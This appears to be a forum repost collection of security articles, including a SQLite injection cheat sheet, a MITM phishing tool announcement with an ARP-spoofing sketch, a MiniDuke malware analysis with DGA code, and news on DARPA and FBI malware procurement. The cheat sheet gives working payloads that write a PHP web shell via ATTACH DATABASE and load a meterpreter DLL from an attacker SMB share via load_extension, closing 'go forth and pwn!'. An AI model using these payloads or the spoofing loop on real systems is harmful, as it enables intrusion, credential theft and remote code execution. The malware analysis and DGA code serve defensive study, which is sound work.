“With speech, much of the communication takes place in ways that do not involve words: in gesture, in tone of voice, in the larger context surrounding the exchange. Speech is a complex audio-visual event, and the implications we draw—the chunks we form—are derived from a whole network of signals. With writing there is nothing but the words on the paper. The result may be as rich as with speech—nobody would accuse a Shakespeare sonnet of lacking richness—but the resources used are far narrower.”

“Writing calls for a sharper focus of attention on the part of both producer and receiver. When you and I are conversing, we both can attend to several other things—watching the passing crowd, worrying about some aspect of work, waving away a passing insect—and still keep the thread of our discourse. If I am writing or reading I must concentrate on the text; these other activities are likely to register as distractions.”

“The pace and pattern of chunking is very different in the two modes. With speech, one word or phrase quickly supersedes the last, and the listener cannot stop to ponder any of them. What he ponders is the chunk he forms from his perception of everything the speaker is saying, and he is not likely to ponder even that very intensively. He does have the opportunity to ask the speaker about what he has heard (an opportunity almost never available to a reader), but he rarely does so; the spoken medium has enormous forward momentum. In compensation, speech uses a much narrower set of verbal formulae than writing. It relies heavily on extralinguistic cues, and by and large it is more closely tied to a larger context that helps keep the participants from straying too far from a common understanding. In the written medium, by contrast, the reader can chunk more or less at his own pace. He can always recheck his conclusion against the text, but he has little recourse beyond that. All the signals a writer can hope to send must be in the written words.”

“A reader is dealing with a finished product: the production process has been essentially private.
A listener is participating in a transaction that is still in progress, a transaction that is quintessentially social.”

“Partly because of the factors listed so far, writing is capable of more breadth and more precision than speech. Neither complex ideas nor complex organizations would be possible without writing. My own impression is that even in this television-dominated era, people attach more solidity and permanence to something written than to something spoken. Perhaps we have an ingrained sense that the products of speech are more ephemeral than the products of writing. But to achieve this aura of permanence writing sacrifices a sense of immediacy. A writer tends to speak with the voice of an observer, not a participant.”

Communicating Knowledge vs News

“… I am building toward an assertion that … there are correlations between news and the cognitive processes involved in speech on the one hand, and between knowledge and the cognitive processes involved in writing on the other.”

Knowledge = “all the scientific and formal statements, all the generalizations, and also all the poetry and art. Producers of such statements are alike in their withdrawal from the ordinary affairs of life to university, laboratory, studio, mountain eyrie, where they write sentences to which other men assent (or refuse to assent), saying, “Yes, this is indeed how things are.””

News = “statements that are significant precisely insofar as the reader is caught up in the affairs and in the life of the island and insofar as he has not withdrawn into laboratory or seminar room.”

You can categorize knowledge vs news using the following filters:

“Nature of the sentence. Knowledge can in theory be arrived at “anywhere by anyone and at any time”; news involves a nonrecurring event or state of affairs which bears on the life of the recipient.”

“Posture of the reader. The reader of a piece of knowledge stands “outside and over against the world;” the reader of a piece of news is receiving information relevant to his specific situation.”

“Scale of evaluation. We judge knowledge according to the degree it achieves generality; we judge news according to its relevance to our own predicament.”

“Canons of acceptance. We verify knowledge either experimentally or in light of past experience. News is “neither deducible, repeatable, nor otherwise confirmable at the point of hearing.” We react to it on the basis of its relevance to our predicament, the credentials of the newsbearer (according to Percy, “a piece of news requires that there be a newsbearer”), and its plausibility.”

“Response of the reader. A person receiving a piece of knowledge will assent to it or reject it; a person receiving a piece of news will take action in line with his evaluation of the news. (And, I would add, the receiver of a piece of news is more immediately concerned than the reader of a piece of knowledge with the correctness of the information.)”

Continue Reading: Thinking & Writing – The CIA’s Guide to Cognitive Science & Intelligence Analysis

Sursa: SimoleonSense | Thinking & Writing : The CIA’s Guide to Cognitive Science & Intelligence Analysis
  19. SQLite3 Injection Cheat Sheet posted May 31, 2012, 9:39 PM by Nickosaurus Hax

Introduction

A few months ago I found an SQL injection vulnerability in an enterprisey webapp's help system. Turns out this was stored in a separate database - in SQLite. I had a Google around and could find very little information about exploiting SQLI with SQLite as the backend.. so I went on a hunt, and found some neat tricks. This is almost entirely applicable only to webapps using SQLite - other implementations (in Adobe, Android, Firefox etc) largely don't support the tricks below.

Cheat Sheet

Comments                                  --
IF statements                             CASE
Concatenation                             ||
Substring                                 substr(x,y,z)
Length                                    length(stuff)
Generate single quote                     select substr(quote(hex(0)),1,1);
Generate double quote                     select cast(X'22' as text);
Generate double quote (method 2)          .. VALUES ("<?xml version="||""""||1||
Space-saving double quote generation      select replace("<?xml version=$1.0$>","$",(select cast(X'22' as text)));

Four consecutive double quotes turn into a single double quote because doubling a quote character inside a quoted token escapes it, so """" is a one-character string containing just ". Quirky, but it works. (These string-building primitives are exercised in the short sketch at the end of this post.)

Getting Shell Trick 1 - ATTACH DATABASE

What it says on the tin - lets you attach another database for your querying pleasure. Attach another known db on the filesystem that contains interesting stuff - e.g. a configuration database. Better yet - if the designated file doesn't exist, it will be created. You can create this file anywhere on the filesystem that you have write access to. PHP example:

?id=bob'; ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<? system($_GET['cmd']); ?>');--

Then of course you can just visit lol.php?cmd=id and enjoy code exec! This requires stacked queries to be a goer.

Getting Shell Trick 2 - SELECT load_extension

Takes two arguments:
A library (.dll for Windows, .so for *NIX)
An entry point (SQLITE_EXTENSION_INIT1 by default)

This is great because:
This technique doesn't require stacked queries
The obvious - you can load a DLL right off the bat (meterpreter.dll?)

Unfortunately, this component of SQLite is disabled in the libraries by default. SQLite devs saw the exploitability of this and turned it off. However, some custom libraries have it enabled - for example, one of the more popular Windows ODBC drivers. To make this even better, this particular injection works with UNC paths - so you can remotely load a nasty library over SMB (provided the target server can speak SMB to the Internets). Example:

?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

This works wonderfully.

Other neat bits

If you have direct DB access, you can use PRAGMA commands to find out interesting information:

PRAGMA database_list; -- Shows info on the attached databases, including location on the FS. e.g.
0|main|/home/vt/haxing/sqlite/how.db

PRAGMA temp_store_directory = '/filepath'; -- Supposedly sets directory for temp files, but deprecated. This would've been pretty sweet with the recent Android journal file permissions bug.

Conclusion / Closing Remarks

SQLite is used in all sorts of crazy places, including Airbus, Adobe, Solaris, browsers, extensively on mobile platforms, etc. There is a lot of potential for further research in these areas (especially mobile) so go forth and pwn!

Sursa: https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
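As a quick sanity check of the string-building primitives in the cheat sheet above, here is a minimal sketch using Python's built-in sqlite3 module; the expressions are taken from the table, while the wrapper function is purely illustrative:

import sqlite3

db = sqlite3.connect(":memory:")

def one(expr):
    # Evaluate a single SQLite expression and return its value
    return db.execute("select " + expr).fetchone()[0]

print one("substr(quote(hex(0)),1,1)")    # ' (single quote)
print one("cast(X'22' as text)")          # " (double quote)
print one("'sql' || 'ite'")               # concatenation -> sqlite
print one("length('stuff')")              # 5
print one("replace('<?xml version=$1.0$>','$',(select cast(X'22' as text)))")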
  20. [h=1]DARPA Unveils Hack-Proof Drone[/h] by Kris Osborn on May 21, 2014

The Pentagon’s research arm unveiled a new drone built with secure software that prevents the control and navigation of the aircraft from being hacked. The program, called High Assurance Cyber Military Systems, or HACMS, uses software designed to thwart cyber attacks. It has been underway with the Defense Advanced Research Projects Agency for several years after originating at the University of California, San Diego and the University of Washington, said Kathleen Fisher, HACMS program manager for DARPA.

“The software is designed to make sure a hacker cannot take over control of a UAS. The software is mathematically proven to be invulnerable to large classes of attack,” Fisher said.

The mini drone is engineered with mathematically assured software, making it invulnerable to cyber attack. Citing the success of mock-enemy or “red-team” exercises wherein cyber experts tried to hack into the quadcopter and failed, Fisher indicated that DARPA experts have referred to the prototype quadcopter as the most secure UAS in the world.

“We started out with the observation that many vehicles are easy for malicious hackers to tamper with the software and take control remotely. We’ve replaced all the software with our high assurance software that was developed using the tools and techniques that were invented in the program,” Fisher said.

The drone prototype was among more than 100 projects and 29 advanced research programs on display in the Pentagon’s courtyard Wednesday in what was billed as DARPA Demo Day. The HACMS program develops system architecture models, software components and operating system software, DARPA officials said. Vulnerabilities or security issues can arise when drones or other military aircraft are “networked” to one another so that they can share information in real time. Security risks can emerge through network protocols, software bugs or unintended interactions between otherwise correct components, DARPA officials explained.

“Many things have computers inside and those computers are networked to talk to other things. Whenever you have that situation, you have the possibility for remote vulnerabilities where somebody can use the network connection to take over and get the device to do what the attacker wants instead of what the owner wants,” Fisher explained.

The software tools used for the HACMS program can be adapted to larger platforms. In fact, DARPA plans to transition the secure software to Boeing’s Unmanned Little Bird helicopter, DARPA officials said. “The software is foundational so it could be used for a large number of systems,” Fisher added.

Sursa: http://defensetech.org/2014/05/21/darpa-unveils-hack-proof-drone/
  21. [h=2]MITMER- MITM Testing Tool[/h]

Securing the traffic on your network is important for preventing MITM (man-in-the-middle) attacks, which can be used to sniff sensitive information. Some users need to reach sensitive office portals to do their work remotely, without verifying the security of the network they are using; if you have to use an untrusted network, you should enable a VPN to make sure all of your traffic is encrypted. On the other hand, if you decide to run a penetration test on a network, there are several tools that allow you to conduct man-in-the-middle attack testing, and one of them is MITMER. The tool provides the following:

MITM attack on a specific host or all LAN hosts.
Show HTTP and DNS activity of attacked hosts.
Fake DNS queries asking about some website and redirect them to your PC.
Convert that website into a fake page and host it on your PC.
Reveal credentials entered into that fake page.

The tool is written in Python using Scapy and can run ARP or DNS spoofing (see the sketch below) to redirect users to a phishing website and capture their credentials for Gmail, Twitter, Facebook or other online services. You can download the tool from: https://github.com/husam212/MITMer

Sursa: MITMER- MITM Testing Tool | SecTechno
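For background on the ARP spoofing mode mentioned above, here is a minimal Scapy sketch of the cache-poisoning step that such tools automate; this is illustrative rather than MITMER's actual code, all addresses are invented, and it should only be run against hosts you own:

from scapy.all import ARP, Ether, sendp
import time

victim_ip, victim_mac = "192.168.1.10", "aa:bb:cc:dd:ee:ff"
gateway_ip = "192.168.1.1"

# Unsolicited ARP reply (op=2, "is-at") telling the victim that the
# gateway's IP maps to our MAC; hwsrc defaults to our interface's MAC.
poison = Ether(dst=victim_mac) / ARP(op=2, psrc=gateway_ip,
                                     pdst=victim_ip, hwdst=victim_mac)

while True:
    sendp(poison, verbose=False)  # re-send so the poisoned entry never expires
    time.sleep(2)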
  22. [h=3]PortEx[/h]

[h=3]Welcome to PortEx[/h]

PortEx is a Java library for static malware analysis of portable executable files. It is written in Java and Scala, but targeted at Java applications.

[h=3]Features (so far)[/h]

Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
Dumping of: MSDOS Load Module, Sections, Overlay, embedded ZIP, JAR or .class files
Mapping of Data Directory Entries to the corresponding Section
Reading standard section formats: Import Section, Resource Section, Export Section, Debug Section
Scanning for file anomalies, including usage of deprecated, reserved or wrong values
Scan for PEiD signatures or your own signature database
Scan for jar2exe or class2exe wrappers
Scan for Unicode and ASCII strings contained in the file
Overlay detection
Get a Virustotal report

For more information have a look at the PortEx Wiki and the Documentation.

Sursa: https://katjahahn.github.io/PortEx/
  23. At the end of April Microsoft announced that a vulnerability in Word was actively being exploited. This vulnerability occurred in parsing RTF files and was assigned CVE-2014-1761; a thorough analysis of it can be found on the HP Security Research blog. We have since seen multiple cases where this exploit is used to deliver malware, and one was particularly interesting as it contained a new variant of MiniDuke (also known as Win32/SandyEva). MiniDuke was first discussed by Kaspersky in March 2013 in their paper The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor, and shortly after in a paper by Bitdefender. Some of the characteristics of MiniDuke — such as its small size (20 KB), its crafty use of assembly programming, and the use of zero-day exploits for distribution — made it an intriguing threat. Although the backdoor is still quite similar to its previous versions, some important changes were made since last year, the most notable being the introduction of a secondary component written in JScript to contact a C&C server via Twitter.

The RTF exploit document

The exploit document was named Proposal-Cover-Sheet-English.rtf and is quite bland compared to the documents used in 2013, which were of a political nature. We received the document on April 8th, only three days after the compilation of the MiniDuke payload, dated April 5th in the PE header. The payload remains quite small at only 24 KB. The functionality of the shellcode which is executed by triggering the vulnerability is rather simple and straightforward. After decrypting itself and obtaining the addresses of some functions exported by kernel32.dll, it decrypts and drops the payload in the %TEMP% directory in a file named “a.l”, which is subsequently loaded by calling kernel32!LoadLibraryA.

An interesting thing about the shellcode is that before transferring control to any API function it checks the first bytes of the function in order to detect hooks and debugger breakpoints which may be set by security software and monitoring tools. If any of these are found, the shellcode skips the first 5 bytes of the function being called by manually executing the prologue instructions (mov edi, edi; push ebp; mov ebp, esp) and then jumping to the function code as illustrated below. The next graph presents the execution flow of this malware when the exploitation is successful. As mentioned previously, this version of the MiniDuke payload comes with two modules, which we refer to as the main module and the TwitterJS module.

Execution flow of MiniDuke

[h=1]Main Component[/h]
[h=2]Installation[/h]

Once MiniDuke receives control it checks that the host process is not rundll32.exe and whether the current directory is %TEMP%. If either of those conditions is met, the malware assumes it is run for the first time and proceeds with its installation onto the system. MiniDuke gathers information about the system and encrypts its configuration based on that information, a method also used by OSX/Flashback (this process is called watermarking by Bitdefender). The end result is that it is impossible to retrieve the configuration of an encrypted payload if analyzing it on a different computer.
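To illustrate the watermarking idea, here is a short Python 2 sketch in the spirit of Appendix B. The key derivation (MD5 over the three host values listed next) and the rolling-XOR cipher are simplifications chosen for illustration, not MiniDuke's actual scheme, and all host values are invented:

import hashlib

def derive_host_key(volume_serial, cpu_info, computer_name):
    # Key material comes only from host-specific values, so a configuration
    # encrypted on one machine cannot be decrypted on another
    material = "%08X|%s|%s" % (volume_serial, cpu_info, computer_name)
    return hashlib.md5(material).digest()

def xor_crypt(data, key):
    # Placeholder cipher: rolling XOR with the derived 16-byte key
    return "".join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in xrange(len(data)))

key = derive_host_key(0x1234ABCD, "GenuineIntel", "VICTIM-PC")
blob = xor_crypt("c2=twitter.com/FloydLSchwartz", key)
assert xor_crypt(blob, key) == "c2=twitter.com/FloydLSchwartz"  # same host values -> round-trips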
The information collected on infection has not changed since the previous version and consists of the following values:

volume serial number (obtained from kernel32!GetVolumeInformationA)
CPU information (obtained with the cpuid instruction)
computer name (obtained from kernel32!GetComputerNameA)

Once the encrypted version of the malware is created, it is written into a file in the %ALLUSERSPROFILE%\Application Data directory. The name of the file is randomly picked from the following values (you can find this listing and those of the next screenshots in the VirusRadar description):

The filename extension is also picked randomly from the following list:

To persist on the infected system after reboots, the malware creates a hidden .LNK file in the “Startup” directory pointing to the modified main module. The name of the .LNK file is randomly drawn from the following values:

The .LNK file is created using a COM object with the IShellLinkA interface and contains the following command:

“C:\Windows\system32\rundll32.exe %path_to_main_module%, export_function”

Which gives something like:

“C:\Windows\system32\rundll32.exe C:\DOCUME~1\ALLUSE~1\APPLIC~1\data.cat, IlqUenn“.

[h=2]Operation[/h]

When the malware is loaded by rundll32.exe and the current directory isn’t %TEMP%, the malware starts by gathering the same system information as described in the “Installation” section to decrypt the configuration information. As with the previous version of MiniDuke, it checks for the presence of the following processes in the system:

If any of these are found in the system, the configuration information will be decrypted incorrectly, i.e. the malware will run on the system without any communication to C&C servers. If the configuration data is decrypted correctly, MiniDuke retrieves the Twitter page of @FloydLSchwartz and searches it for URLs carrying a special tag that point to its C&C. The account @FloydLSchwartz does exist but has only retweets and no strings with the special tag.

As the next step, MiniDuke gathers the following information from the infected systems:

computer name and user domain name
country code of the infected host IP address obtained from http://www.geoiptool.com
OS version information
domain controller name, user name, groups a user account belongs to
a list of AV products installed onto the system
Internet proxy configuration
version of MiniDuke

This information is then sent to the C&C server along with the request to download a payload. The final URL used to communicate with the C&C server looks like this:

<url_start>/create.php?<rnd_param>=<system_info>

Those tokens are derived as follows (see the sketch below):

url_start – the URL retrieved from the Twitter account
rnd_param – a randomly generated parameter name, made of lower-case alphabet characters, in the query string of the URL
system_info – base64-encoded and encrypted system information

An example of such a URL is given below. The payload is downloaded into a file named “fdbywu” using the urlmon!URLDownloadToFileA API:

The downloaded payload is a fake GIF8 file containing an encrypted executable. The malware processes the downloaded file in the same way as previous samples of MiniDuke: it verifies the integrity of the file using RSA-2048, then decrypts it, stores it in a file and finally executes it. The RSA-2048 public key used to verify the integrity of the executable inside the GIF file is the same as in the previous version of MiniDuke.
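The URL format above can be made concrete with a minimal Python 2 sketch; the parameter length, the (omitted) encryption of the system information, and the exact encoding details are assumptions for illustration:

import base64, random, string

def build_beacon_url(url_start, encrypted_sysinfo):
    # <url_start>/create.php?<rnd_param>=<system_info>
    rnd_param = "".join(random.choice(string.ascii_lowercase) for _ in xrange(8))
    system_info = base64.b64encode(encrypted_sysinfo)
    return "%s/create.php?%s=%s" % (url_start, rnd_param, system_info)

# Invented values; the real sample carries encrypted host data here
print build_beacon_url("http://example.com/path", "ciphertext-bytes")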
[h=2]Twitter Generation Algorithm[/h]

In the event that MiniDuke is unable to retrieve a C&C URL from this account, it generates a username to search for based on the current date. The search query changes roughly every seven days and is similar to the backup mechanism in previous versions, which used Google searches. A Python implementation of the algorithm can be found in Appendix B.

[h=2]TwitterJS component[/h]

The TwitterJS module is extracted by creating a copy of the Windows DLL cryptdll.dll, injecting a block of code into it and redirecting the exported functions to this code. Here is how the export address table of the patched binary looks after the modifications. This file is then stored in an Alternate Data Stream (ADS) in NTUSER.DAT in the %USERPROFILE% folder. Finally this DLL is registered as the handler for the Open command on drives, which has the effect of starting the bot every time the user opens a disk drive. Below you can find the content of the init.cmd script used by MiniDuke to install the TwitterJS module onto the system.

When loaded, TwitterJS instantiates the JScript COM object and decrypts a JScript file containing the core logic of the module. Prior to executing it, MiniDuke applies a light encoding to the script. The next images show the result of two separate obfuscations; we can see that the variables have different values. This is probably done to thwart security systems that scan at the entry points of the JScript engine.

Result of first obfuscation
Result of second obfuscation

The purpose of this script is to use Twitter to find a C&C and retrieve JScript code to execute. It first generates a Twitter user to search for; this search term changes every 7 days and is actually matched against the account's real name, not its Twitter handle. The bot then visits the Twitter profiles returned by the search and looks for links that end with “.xhtml“. When one is found, it replaces “.xhtml” with “.php” and fetches that link. Information about the computer is embedded in the Accept HTTP header. The first link on the retrieved page should contain base64 data; the name attribute of the link is used as a rolling XOR key to decrypt the JScript code (a sketch of this step follows below). Finally, MiniDuke calculates a hash of the fetched script and compares it with a hash hardcoded in the TwitterJS script. If they match, the fetched script is executed by calling eval().
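Here is a minimal Python 2 sketch of that decoding step; the key and payload are invented sample data rather than material from a real C&C page:

import base64

def rolling_xor(data, key):
    # XOR each byte with the key, repeating the key as needed
    return "".join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in xrange(len(data)))

# Imagine the fetched page carries: <a name="k3y">BASE64DATA</a>
key = "k3y"
page_blob = base64.b64encode(rolling_xor("WScript.Echo('next stage');", key))

# What the bot does with the link: decode, decrypt, then hash-check and eval()
script = rolling_xor(base64.b64decode(page_blob), key)
assert script == "WScript.Echo('next stage');"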
[h=2]The tale of the broken SHA-1[/h]

The code hashing algorithm used by the component looks very much like SHA-1 but outputs different hashes (you can find the complete implementation in Appendix B). We decided to search for what was changed in the algorithm; one of our working hypotheses was that the algorithm might have been altered to make collisions feasible. We couldn’t find an obvious difference; all the constants and the steps of the algorithm were as expected. Then we noticed that for short messages only the second 32-bit word was different when compared to the original SHA-1.

SHA1(‘test’) : a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
TwitterJS_SHA1(‘test’) : a94a8fe5dce4f01c1c4c0873d391e987982fbbd3

By examining how this 2nd word was generated we finally discovered that this was caused by a scope issue. As shown below, the SHA-1 function uses a variable named f; the function Z() is then called, which also uses a variable named f without the var keyword, causing it to be treated as a global variable rather than local to the function. The end result is that the value of f is also changed in the SHA-1 function, which affects the value of the 2nd word for that round and ultimately the whole hash for long messages.

A likely explanation of how this problem came to be is that the variable names were changed to single letters using an automated tool prior to embedding the script in the payload. The two f variables probably had different names in the original script, which avoided the issue. So this leaves us with two takeaways: 1) the difference in the hashing algorithm was unintentional, and 2) always declare your local variables with the var keyword. ;-)

[h=2]Twitter DGA accounts[/h]

We generated the list of Twitter search terms for 2013-2014 and checked if any of those were registered. At the moment only one exists, @AA2ADcAOAA, which is the TwitterJS account that was generated between August 21st and 27th 2013. This account has no tweets. In an effort to discover potential victims, we registered the Twitter accounts corresponding to the current week both for the main and TwitterJS components and set up tweets with encrypted URLs so that an infected computer would reach out to our server. So far we have received connections via the TwitterJS accounts from four computers located in Belgium, France and the UK. We have contacted national CERTs to notify the affected parties.

We detect the RTF exploit document as Win32/Exploit.CVE-2014-1761.D and the MiniDuke components as Win32/SandyEva.G.

[h=3]Appendix A: SHA-1 hashes[/h]

SHA-1                                      Description
58be4918df7fbf1e12de1a31d4f622e570a81b93   RTF with Word exploit CVE-2014-1761
b27f6174173e71dc154413a525baddf3d6dea1fd   MiniDuke main component (before config encryption)
c059303cd420dc892421ba4465f09b892de93c77   TwitterJS javascript code

[h=3]Appendix B: DGA algorithms[/h]

Main component DGA:

import sys
import hashlib
import datetime
from array import array
import base64

def init_params(date_time):
    duke_string = "vSkadnDljYE74fFk"
    to_hash = array("B")
    for ix in xrange(0x40):
        to_hash.append(0)
    for ix in xrange(len(duke_string)):
        to_hash[ix + 8] = ord(duke_string[ix])
    to_hash[0] = date_time.day / 7
    to_hash[2] = date_time.month
    to_hash[4] = date_time.year & 0xFF
    to_hash[5] = date_time.year >> 8
    return to_hash

def hash_data(to_hash):
    m = hashlib.md5()
    m.update(to_hash.tostring())
    hash_val = m.digest()
    first_dword = ord(hash_val[0]) | (ord(hash_val[1]) << 8) | (ord(hash_val[2]) << 16) | (ord(hash_val[3]) << 24)
    last_dword = ord(hash_val[12]) | (ord(hash_val[13]) << 8) | (ord(hash_val[14]) << 16) | (ord(hash_val[15]) << 24)
    new_dword = (first_dword + last_dword) & 0xFFFFFFFF
    to_append = array("B", [new_dword & 0xFF, (new_dword >> 8) & 0xFF, (new_dword >> 16) & 0xFF, (new_dword >> 24) & 0xFF])
    return hash_val + to_append.tostring()

def generate_twitter_dga(date_time):
    to_hash = init_params(date_time)
    hash_val = hash_data(to_hash)
    hash_val_encoded = base64.b64encode(hash_val)
    dga_len = ord(hash_val_encoded[0]) | (ord(hash_val_encoded[1]) << 8) | (ord(hash_val_encoded[2]) << 16) | (ord(hash_val_encoded[3]) << 24)
    dga_len = dga_len % 6
    dga_len += 7
    if ord(hash_val_encoded[0]) <= 0x39:
        hash_val_encoded = chr(0x41) + hash_val_encoded[1:]
    dga_res = ""
    for i in xrange(dga_len):
        if hash_val_encoded[i] == '+':
            dga_res += 'a'
        elif hash_val_encoded[i] == '/':
            dga_res += '9'
        else:
            dga_res += hash_val_encoded[i]
    return dga_res

start_date = datetime.datetime.strptime(sys.argv[1], "%Y-%m-%d")
number_of_weeks = long(sys.argv[2])
for ix in xrange(number_of_weeks):
    print generate_twitter_dga(start_date + datetime.timedelta(days=7 * ix))
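Assuming the listing above is saved as miniduke_dga.py, it can be run under Python 2 with a start date and a number of weeks, printing one candidate account name per week:

python miniduke_dga.py 2014-04-01 10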
[h=3]TwitterJS DGA[/h]

function twitterjs_sha1(s) {
    x = Q(s);
    z = s.length * 8;
    x[z >> 5] |= 0x80 << (24 - z % 32);
    x[((z + 64 >> 9) << 4) + 15] = z;
    w = Array(80);
    a = 1732584193;
    b = -271733879;
    c = -1732584194;
    d = 271733878;
    e = -1009589776;
    for (i = 0; i < x.length; i += 16) {
        q = a; f = b; g = c; h = d; k = e;
        for (j = 0; j < 80; j++) {
            if (j < 16) w[j] = x[i + j];
            else w[j] = Y(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1);
            t = Z(Z(Y(a, 5), N(j, b, c, d)), Z(Z(e, w[j]), (j < 20) ? 1518500249 : (j < 40) ? 1859775393 : (j < 60) ? -1894007588 : -899497514));
            e = d;
            d = c;
            c = Y(b, 30);
            b = a;
            a = t
        }
        a = Z(a, q); b = Z(b, f); c = Z(c, g); d = Z(d, h); e = Z(e, k)
    }
    return Array(a, b, c, d, e)
}

// Note: 'f' is never declared with 'var', so Z() below clobbers the 'f'
// used in twitterjs_sha1() -- this reproduces the scope bug discussed above.
function Z(x, y) {
    f = 0xffff;
    l = (x & f) + (y & f);
    m = (x >> 16) + (y >> 16) + (l >> 16);
    return (m << 16) | (l & f)
}

function N(t, b, c, d) {
    if (t < 20) return (b & c) | ((~b) & d);
    if (t < 40) return b ^ c ^ d;
    if (t < 60) return (b & c) | (b & d) | (c & d);
    return b ^ c ^ d
}

function Y(node_base_64, c) {
    return (node_base_64 << c) | (node_base_64 >>> (32 - c))
}

function Q(s) {
    p = Array(s.length >> 2);
    for (i = 0; i < s.length * 8; i += 8)
        p[i >> 5] |= (s.charCodeAt(i / 8) & 0xff) << (24 - i % 32);
    return p
}

node_base_64 = new ActiveXObject('MSXML2.DOMDocument').createElement('base64');
node_base_64.dataType = 'bin.base64';
for (var year = 2013; year <= 2014; year++) {
    for (var month = 0; month < 12; month++) {
        for (var week = 0; week <= 4; week++) {
            hash = twitterjs_sha1('' + week + month + year);
            y = new ActiveXObject('ADODB.Stream');
            y.Open();
            y.Type = 2;
            y.WriteText('' + hash[0] + hash[1] + hash[2]);
            y.Position = 0;
            y.Type = 1;
            // convert the date seed to Base64
            node_base_64.nodeTypedValue = y.Read();
            y.Close();
            username = node_base_64.text.replace(/.*([A-Za-z]\w{14})/, '$1').substr(0, 7 + week);
            WScript.echo(year + '-' + (month+1) + ' week ' + (week+1) + ' : ' + username);
        }
    }
}
  24. [h=1]zer0m0n v0.6[/h]

zer0m0n is a driver for Cuckoo Sandbox; it performs kernel-level analysis during the execution of a malware sample. There are many ways for a malware author to bypass Cuckoo's detection: he can detect the hooks, hardcode the Nt* functions to avoid the hooks, detect the virtual machine... The goal of this driver is to offer the user the choice between the classical userland analysis and a kernel analysis, which is harder to detect or bypass. Currently it only works on 32-bit Windows XP and Windows 7 machines because of its use of SSDT hooks ( :] ), but we plan to support other OSes.

Sursa: https://github.com/conix-security/zer0m0n
  25. FBI is officially looking for malware development

The FBI (Federal Bureau of Investigation) has issued a solicitation for malware development, confirming the use of malicious code for investigations. The proliferation of malware in cyberspace is not a surprise; according to recent reports, the number of new malicious code instances is rapidly increasing. State-sponsored hackers and cyber criminals are principally responsible for the spike, and the risks are enormous for Internet users, who in many cases are helpless in front of cyber threats; common security countermeasures like antivirus software are not enough to protect their assets online.

What do you think about the possibility that malware is designed or spread by law enforcement? There is a concrete risk that users’ PCs everywhere on the planet will be infected by malicious code designed by agencies like the FBI; law enforcement makes large use of malicious code during investigations despite denying any accusation. The Federal Bureau of Investigation (FBI) is one of the agencies most active in the use of malware, and a recent solicitation (RFQ1307B) of the DoJ confirms it.

“The Federal Bureau of Investigation has a requirement for malware. Please see attached combined synopsis/solicitation for complete requirement.“

The feds recently posted an online listing confirming that the Bureau is looking to purchase malware from a commercial supplier and is now accepting applications. The FBI offers a one-year contract with four one-year options; this is reported in the requirements section:

“The collection of malware from multiple industries, law enforcement and research sources is critical to the success of the FBIs mission to obtain global awareness of malware threat. The collection of this malware allows the FBI to provide actionable intelligence to the investigator in both criminal and intelligence matters.”

The malware supplier is asked to give the FBI about 30GB to 40GB of malware per day through a feed, and the feds must also be able to retrieve the feed directly. The feed shall:

Currently exist (or a system currently exists that can produce the feed)
Contain a rollup of sharable new malware (both unique and variants)
Include a malicious URL report (Reference Section 2.3.2)
Be organized by SHA1 signatures
Be updated once every 24 hours
Be a snapshot of the prior 24 hours
Be, on average, 30GB – 40GB per day
Be able to retrieve feed in an automated way through machine-to-machine communication
Initiations of accessing feed shall be pulled by FBI not pushed to FBI

Which are the risks? The proliferation of malware, from spyware to cyber weapons, could represent a serious problem. F-Secure’s Chief Research Officer Mikko Hyppönen, at the TrustyCon conference in San Francisco, explained that almost every government is spending a great effort to improve its cyber capabilities. Chris Soghoian, principal technologist with the American Civil Liberties Union, during the recent TrustyCon conference highlighted the possibility that the government will exploit automated update services to serve malware and spy on users. Is this the next surveillance frontier? Instead of exploiting established techniques like phishing and watering holes, intelligence agencies and law enforcement could use application updates to deliver malware onto victims’ systems.

“The FBI is in the hacking business. The FBI is in the malware business,” “The FBI may need more than these two tools to deliver malware. They may need something else and this is where my concern is.
This is where we are going and why I’m so worried about trust,” Soghoian said.

The proliferation of malware is a serious menace to cyberspace. I understand the needs of law enforcement agencies, but the use of malicious code must be regulated by a globally accepted framework to avoid the violation of users’ rights.

Pierluigi Paganini (Security Affairs – FBI, malware)

Sursa: FBI is officially looking for malware development | Security Affairs